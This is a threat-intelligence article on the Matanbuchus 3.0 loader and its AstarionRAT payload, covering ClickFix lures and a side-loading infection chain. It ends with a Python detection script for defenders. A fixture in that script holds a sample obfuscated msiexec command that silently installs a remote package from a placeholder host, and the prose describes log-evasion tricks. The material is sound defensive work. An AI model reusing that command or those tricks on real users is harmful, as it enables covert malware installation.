After a nearly year-long break, the premium malware-as-a-service loader Matanbuchus reappeared in February 2026. Version 3.0, the most recent iteration, has a completely rewritten codebase and is sold at a subscription price of up to $15,000 per month, a significant increase over the initial pricing.

This change points to a move away from mass spam campaigns and toward high-value targeted operations. The malware relies on the persistent "ClickFix" social engineering technique: users are tricked into manually executing malicious commands under the pretense of fixing fictitious software updates or browser errors. Rather than exploiting a software flaw, the attack vector abuses the user's trust to get past conventional security controls. Victims are shown deceptive prompts telling them to copy and paste specific commands into PowerShell or the Windows Run dialog.

The malicious URL uses backslashes and path traversal sequences to trick logging systems, so the string a logger records may not match the resource that is actually fetched. Because the user technically starts the process, many common email and perimeter defenses are bypassed. When the command is run, it starts a silent installation with no visible user interface.

According to Huntress analysts, this campaign drops a previously unseen payload, dubbed AstarionRAT, immediately after infection. This custom remote access trojan supports twenty-four distinct commands, including credential theft and SOCKS5 proxying. The impact is frequently almost immediate: operators move laterally across the network and reach domain controllers in under forty minutes. Because the apparent end goal is ransomware deployment or data exfiltration, early detection is crucial for enterprise security teams.

The Chain of Silent Infection

The infection mechanism is deliberately layered to evade automated detection. The victim starts it by running a mixed-case msiexec command that retrieves a payload from a recently registered domain. When the installer runs, it drops a malicious DLL and a legitimate but vulnerable Zillya Antivirus binary into bogus directories with names such as "AegisLynx" or "DocuRay".

Matanbuchus 3.0 advertisement (Source: Huntress)

To further conceal its activity, the malware uses a modified build of the 7-Zip utility to extract a password-protected archive containing the next-stage components. The antivirus binary then side-loads the malicious DLL, which decrypts the Matanbuchus loader.

An overview of the Matanbuchus DLL graph (Source: Huntress)

Finally, this chain starts an embedded Lua interpreter that runs the final AstarionRAT payload directly in memory, leaving investigators as few forensic artifacts on disk as possible. Security teams should configure endpoint detection to flag msiexec commands that contain mixed-case characters or suspicious URL patterns. Checking network connections against recently registered domains and watching for the creation of unusual directories under %APPDATA% are equally important.
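As an added illustration of the detection guidance above (example code written for this page, not code from Huntress or from the original article), the following Python sketch runs four checks over a handful of constructed process-creation and file-creation events: a mixed-case msiexec token, a package URL carrying backslashes or ".." segments (canonicalized before the host is extracted, so the host is compared in the form that is actually fetched), a host whose registration date is recent, and a write into a directory under %APPDATA%\Roaming that is not in a baseline. The event records, the domain name and its registration date, the file names and the baseline set are all constructed placeholders; in a real pipeline the registration lookup would be a WHOIS/RDAP or threat-intel query and the baseline would come from your own fleet.

```python
import re
from datetime import date
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Constructed events (not real telemetry). Field names loosely follow a
# process-creation / file-creation record from an EDR or Sysmon. The domain,
# the registration date and the file names are placeholders, not indicators.
EVENTS = [
    # 0: ClickFix-style launch from the Run dialog: mixed-case msiexec, remote
    #    package URL with backslashes and "..", quiet install.
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"MsIeXeC /i https://cdn-update.example/dl\..\..\x\setup.msi /qn"},
    # 1: ordinary software deployment from a local package (should not fire).
    {"type": "process", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"msiexec /i C:\Users\alice\Downloads\vendor.msi /qn"},
    # 2: files dropped into a made-up vendor directory under %APPDATA%.
    {"type": "file", "path": r"C:\Users\alice\AppData\Roaming\AegisLynx\engine.exe"},
    # 3: routine write into a baseline directory (should not fire).
    {"type": "file", "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Recent\a.lnk"},
]

# Constructed registration dates standing in for a WHOIS/RDAP or threat-intel lookup.
DOMAIN_REGISTERED = {"cdn-update.example": date(2026, 1, 28)}
TODAY = date(2026, 2, 10)
NEW_DOMAIN_DAYS = 30

# Top-level directory names a typical workstation already has under
# %APPDATA%\Roaming (constructed baseline; build yours from your own fleet).
APPDATA_BASELINE = {"microsoft", "adobe", "google", "mozilla"}

URL_RE = re.compile(r"https?:\S+", re.IGNORECASE)
APPDATA_RE = re.compile(r"\\AppData\\Roaming\\([^\\]+)\\", re.IGNORECASE)


def image_name(token: str) -> str:
    """'C:\\Windows\\System32\\MsIeXeC.exe' -> 'MsIeXeC' (case preserved)."""
    return token.rsplit("\\", 1)[-1].split(".")[0]


def is_mixed_case(token: str) -> bool:
    """True for 'MsIeXeC'; False for 'msiexec', 'MSIEXEC' and 'Msiexec',
    the three spellings that appear in normal usage."""
    name = image_name(token)
    return name not in (name.lower(), name.upper(), name.capitalize())


def canonicalize_url(raw: str) -> tuple[str, str]:
    """Return (host, path) after undoing what a naive logger would record
    verbatim: percent-encoding, backslashes used as separators, and '..'
    traversal segments. normpath() collapses '/dl/../../x' to '/x'."""
    fixed = unquote(raw).replace("\\", "/")
    parts = urlsplit(fixed)
    return parts.hostname or "", normpath("/" + parts.path.lstrip("/"))


def analyze_process(ev: dict) -> list[str]:
    """Rules for an msiexec launch; returns an empty list for anything else."""
    findings: list[str] = []
    cmd = ev["cmdline"]
    exe = cmd.split()[0]
    if image_name(exe).lower() != "msiexec":
        return findings
    if is_mixed_case(exe):
        findings.append(f"mixed-case msiexec token: {exe}")
    for raw in URL_RE.findall(cmd):
        host, path = canonicalize_url(raw)
        if "\\" in raw or "/../" in raw.replace("\\", "/"):
            findings.append(f"URL uses backslashes/traversal; canonical https://{host}{path}")
        else:
            findings.append(f"msiexec fetching package from {host}")
        registered = DOMAIN_REGISTERED.get(host)
        if registered is not None:
            age = (TODAY - registered).days
            if age <= NEW_DOMAIN_DAYS:
                findings.append(f"domain {host} registered {age} days ago")
    if URL_RE.search(cmd) and re.search(r"(?i)\s/q", cmd):
        findings.append("quiet install (/q*) of a remote package, no UI shown")
    return findings


def analyze_file(ev: dict) -> list[str]:
    """Flag writes into a top-level %APPDATA%\\Roaming directory not in the baseline."""
    m = APPDATA_RE.search(ev["path"])
    if m and m.group(1).lower() not in APPDATA_BASELINE:
        return [f"write into non-baseline %APPDATA% directory: {m.group(1)}"]
    return []


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Index of each event that fired at least one rule -> its findings."""
    results: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        hits = analyze_process(ev) if ev["type"] == "process" else analyze_file(ev)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for i, hits in triage(EVENTS).items():
        print(f"event {i}: {EVENTS[i]}")
        for h in hits:
            print("   ", h)
```

The point of canonicalizing before matching is that a rule keyed on the raw command line would see a host followed by backslashes and ".." rather than the clean hostname, so a domain-age lookup or a blocklist comparison on the logged string can miss. Tune the "mixed-case" test to your environment: some deployment tooling capitalizes image names, which is why the capitalized spelling is treated as normal here.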

Lastly, train staff never to paste raw commands from a web page into a terminal, PowerShell or the Run dialog.